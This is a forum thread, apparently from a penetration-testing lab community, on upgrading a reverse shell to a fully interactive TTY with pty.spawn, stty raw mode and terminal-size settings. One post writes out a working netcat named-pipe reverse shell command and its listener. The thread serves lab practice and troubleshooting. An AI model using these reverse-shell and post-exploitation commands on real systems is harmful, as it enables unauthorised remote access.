Obtaining a Fully Interactive Shell

you wont always have python so this is a good resource to have bookmarked:
https://netsec.ws/?p=337

@princeade said:
guy, nicely put , i once was looking for how to nano a file though a shell not ssh… had to finally echo my code into the file on the PWK labs…

question: Does this work for all reverse shell gotten through other means like (php, perl and python) or only nc shells?

The majority of connect back shells should work fine. I meant nc as the listening service on the local machine. Refer to the netsec.ws link that @sajkox posted to see other options.

I’ve tried the above method few times, but it failed every time. I don’t understand what am I doing wrong…
After doing fg, Enter key is displayed as ^M
Something like this:

$ fg
                           clear^M

Have a look at ippsec’s video to see it in action: Joker

Note he did /bin/sh in pty.spawn. Should have been /bin/bash

Even I do /bin/bash every time I try…
I’ve followed all his tutorials so far and I’ve tried to imitate it.
No luck so far…

What machine are you trying this on, what kind of reverse connection and what are you using for a listener?

I tried this on Parrot OS which is debian based with mate DE.
And the reverse connection was:

mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc 10.10.x.x 4000 1> /tmp/backpipe

And listening with:

nc -nvlp 4000

Hmm works for me with that exact connect back method in Kali. Tested on CronOS:

This is what’s happening at my end

I got the same output when I tried with some of the HTB machines.

@hkh4cks it might be down to ohmyzsh I think

Great find @sajkox ! :smiley:
That was the issue…
Thank you guys for looking into it :slight_smile:

@hkh4cks try pressing enter a couple times after foregrounding the process

Nice thread guys… My 2 coins…

stty rows 50 cols 200

To fix your rows/cols in your terminal. Especially useful when you do ps so you can see the full length of the process command.

You can play also with the TERM env variable if not set already eg. export TERM=xterm

@PinkPanther it worked when I switched to bash from zsh.
Nice tip @SuRGeoNix

What about -e /bin/bash?

hi all

you can have TTY in http shell or web based shell by providing credentials. that is usefull in case of server in droping requests on other ports etc

Bump, as several people have been asking about this topic recently

Hi @hkh4cks
how did you fix the ohmyzsh error with the netcat shell after doing fg.
cant find anything to fix that

I came across this while trying to solve similar issues, might help others. There are few additional commands to what is listed in first post.

• On the remote machine, run python -c ‘import pty; pty.spawn(“bash”)’ and press CTRL-z to put the SSH session to the background.
• Then run stty -a to print out information about your shell. Note the rows and columns (say they are 40 and 160 respectively).
• Now run stty raw -echo to put your shell into raw mode, then fg to get back into the SSH session, and finally reset to reset the shell. It you get asked for the type of the terminal, use xterm-256color.
• After that, run stty rows 40 columns 160 to specify the correct size. You should now have a fully working shell, in particular vi should work.

That’s a great thing to share, so here are my two cents:

  • Spawning bash with python:
$ python -c 'import pty; pty.spawn("/bin/bash")'
  • Background’ing the remote shell with CTRL-Z:
user@remote:~$ ^Z
  • Getting ROWS and COLS within current terminal window:
user@local:~$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
  • Ignoring hotkeys in the local shell and getting back to the remote:
user@local:~$ stty raw -echo; fg
  • Setting correct size for the remote shell (where ROWS and COLS are the values from the 3rd bullet):
user@remote:~$ stty rows ROWS cols COLS
  • Adding some colors:
user@remote:~$ export TERM=xterm-256color
  • Reloading bash to apply the TERM variable:
user@remote:~$ exec /bin/bash

:triumph:

2 Likes